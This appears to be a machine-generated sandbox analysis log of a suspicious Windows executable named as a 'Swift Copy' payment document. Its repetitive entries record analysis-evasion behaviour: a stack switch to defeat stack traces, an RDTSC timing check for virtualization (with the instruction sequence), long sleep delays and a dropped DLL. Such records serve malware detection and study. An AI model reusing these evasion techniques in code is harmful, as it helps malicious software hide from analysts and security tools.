Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	API/Special instruction interceptor: Address: 503A079
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	API/Special instruction interceptor: Address: 37EA079

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	RDTSC instruction interceptor: First address: 501534D second address: 501534D instructions: 0x00000000 rdtsc 0x00000002 cmp edx, ebx 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F590D2A9850h 0x00000008 inc ebp 0x00000009 test esi, 71E5EA69h 0x0000000f inc ebx 0x00000010 test eax, edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	RDTSC instruction interceptor: First address: 37C534D second address: 37C534D instructions: 0x00000000 rdtsc 0x00000002 cmp edx, ebx 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F590CEB5510h 0x00000008 inc ebp 0x00000009 test esi, 71E5EA69h 0x0000000f inc ebx 0x00000010 test eax, edx 0x00000012 rdtsc

Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Memory allocated: 5560000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Memory allocated: 35DA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Memory allocated: 35A50000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 599124	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 598796	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 598577	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 598467	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 598250	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 598140	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 597921	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 597811	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 597593	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 597483	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 597374	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 597046	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 596937	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 596827	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 596718	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 596400	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 596006	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 595890	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 595781	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 595671	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 595562	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 595453	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 595343	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 595124	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 595015	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 594906	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 594796	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 594687	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 594468	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 594359	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 594250	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 594140	Jump to behavior

Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Window / User API: threadDelayed 1239			Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Window / User API: threadDelayed 8609			Jump to behavior

Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsp2DFD.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe

API coverage: 1.7 %

Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772	Thread sleep time: -25825441703193356s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 4628	Thread sleep count: 1239 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 4628	Thread sleep count: 8609 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772	Thread sleep time: -599671s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772	Thread sleep time: -599562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772	Thread sleep time: -599343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772	Thread sleep time: -599234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772	Thread sleep time: -599124s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772	Thread sleep time: -599015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772	Thread sleep time: -598906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772	Thread sleep time: -598796s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772	Thread sleep time: -598687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772	Thread sleep time: -598577s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772	Thread sleep time: -598467s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772	Thread sleep time: -598359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772	Thread sleep time: -598250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772	Thread sleep time: -598140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772	Thread sleep time: -598031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772	Thread sleep time: -597921s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772	Thread sleep time: -597811s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772	Thread sleep time: -597703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772	Thread sleep time: -597593s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772	Thread sleep time: -597483s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772	Thread sleep time: -597374s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772	Thread sleep time: -597265s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772	Thread sleep time: -597156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772	Thread sleep time: -597046s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772	Thread sleep time: -596937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772	Thread sleep time: -596827s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772	Thread sleep time: -596718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772	Thread sleep time: -596609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772	Thread sleep time: -596400s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772	Thread sleep time: -596156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772	Thread sleep time: -596006s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772	Thread sleep time: -595890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772	Thread sleep time: -595781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772	Thread sleep time: -595671s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772	Thread sleep time: -595562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772	Thread sleep time: -595453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772	Thread sleep time: -595343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772	Thread sleep time: -595234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772	Thread sleep time: -595124s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772	Thread sleep time: -595015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772	Thread sleep time: -594906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772	Thread sleep time: -594796s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772	Thread sleep time: -594687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772	Thread sleep time: -594578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772	Thread sleep time: -594468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772	Thread sleep time: -594359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772	Thread sleep time: -594250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe TID: 3772	Thread sleep time: -594140s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 0_2_00402706 FindFirstFileW,	0_2_00402706
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 0_2_00405731 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405731
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 0_2_004061E5 FindFirstFileW,FindClose,	0_2_004061E5
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_00402706 FindFirstFileW,	6_2_00402706
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_00405731 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	6_2_00405731
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Code function: 6_2_004061E5 FindFirstFileW,FindClose,	6_2_004061E5

Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 599124	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 598796	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 598577	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 598467	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 598250	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 598140	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 597921	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 597811	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 597593	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 597483	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 597374	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exe	Thread delayed: delay time: 597046	Jump to behavior
